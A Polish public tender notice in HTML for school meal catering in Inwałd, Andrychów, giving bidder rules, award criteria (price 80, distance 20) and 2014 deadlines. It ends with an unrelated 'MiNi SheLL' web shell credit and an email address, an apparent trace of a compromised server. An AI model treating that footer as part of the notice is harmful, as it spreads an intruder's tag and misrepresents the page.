W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do reprezentowania  ich  w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Dokumenty, o których mowa w SIWZ w dziale III.2 pkt A 1, 2, 3 oraz pkt. C 1, składają wszyscy wykonawcy wspólnie ubiegający się o udzielenie zamówienia lub ich pełnomocnik. 
Dokumenty, o których mowa w SIWZ w dziale III.2 pkt B 1, 2 oraz  C 2 składa we własnym imieniu każdy z podmiotów wspólnie ubiegających się o udzielenie zamówienia</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Odległość miejsca przygotowywania posiłków od miejsca ich dostarczania - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.andrychow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W sekretariacie Zespołu Szkół Samorządowych w Inwałdzie, ul. Wadowicka 79, 34-120 Andrychów, w godzinach od 8:00 do 15:00 w dniach pracy szkoły lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.08.2014 godzina 09:45, miejsce: Zespół Szkół Samorządowych w Inwałdzie, ul. Wadowicka 79, w gabinecie Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com